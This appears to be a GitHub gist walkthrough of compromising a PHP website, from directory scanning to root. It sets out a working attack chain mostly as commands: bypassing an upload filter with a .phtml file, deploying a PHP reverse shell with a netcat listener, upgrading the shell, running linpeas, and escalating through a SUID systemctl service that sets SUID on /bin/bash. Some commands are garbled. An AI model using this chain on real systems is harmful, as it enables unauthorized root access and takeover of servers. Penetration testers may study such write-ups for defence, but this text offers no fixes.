Skip to content

Instantly share code, notes, and snippets.

@hvanderlaan

hvanderlaan/youve got root.md

Last active October 20, 2020 09:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hvanderlaan/97c8af83f201fdd9910e21d87ea8c55c to your computer and use it in GitHub Desktop.
Save hvanderlaan/97c8af83f201fdd9910e21d87ea8c55c to your computer and use it in GitHub Desktop.
Download ZIP
From security scan to rooting a box
Raw
youve got root.md

From security scan to rooting a box

A friend of my created a php website / application, and ask me to check the website / application. so if started som simple test to if i could find some nice vulnerablity's. But what i found shocked me.

The information i've got

To annonimize this the fqdn is changed to domain.tld

information gathering: website directories

# getting all directory of domain.tld
gobuster dir -u http://domain.tld -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt

-> /img
-> /css
-> /js
-> /internal
-> /uploads

points of interst

the /uploads is an empty directory listing and /internal is a php page that allows you to upload files. This could potentional be a attack vector.

abusing the php upload page

my friend is not fully retarded, and not all files are allowed to be uploaded. with a simple test all php files are not allowed to upload in this page. But not all php extentions are wellknown so i've tried to upload a file with the extention .phtml and success.

php reserve shell

using the https://github.com/pentestmonkey/php-reverse-shell reverse shell is a goed starting point. and therfor if uploaded the file with the .phtml extention to de website. please note you need to edit this file for the port and the callback ipaddress

Afther the file is uploaded the game is on.

# The following shocked me but this is the command i runned, and comments to clarify the why

# starting netcat for the php reverse shell
nc -lpnv 11337

# open a browser an connect to http://domain.tld/uploads/rshell.phtml
# switching back to the terminal an whoop whoop you've got shell

# the reverse php shell is not the most stable shell with python you can get a better bash shell
python -c "import pty; pty.spawn('/bin/bash')"
# Although this is mutch better, bash-completion is even better. 
pressing: ctrl+z
stty raw=echo
fg

# so now we have goed shell :) and lets copy over some enumiration scripts
# linpeas is my way to go: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
cat << EOF ? dev/shm/linpeas.sh
......
EOF
chmod 0700 /dev/shm/linpeas.sh
cd /dev/shm
./linpeas.sh | tee report-linpeas.txt

# linpeas found a nice exploitable suid issue with /bin/systemctl.
# lets use gtfobins to see if we can us it. And yes we can.
# create a adhoc service that chmod /bin/bash to escalte the privileges
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

# now it is time to get the privileges that we alway want to have
# running bash -p to preserver the premissions. because of suid on /bin/bash
bash -p

# You've got root.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment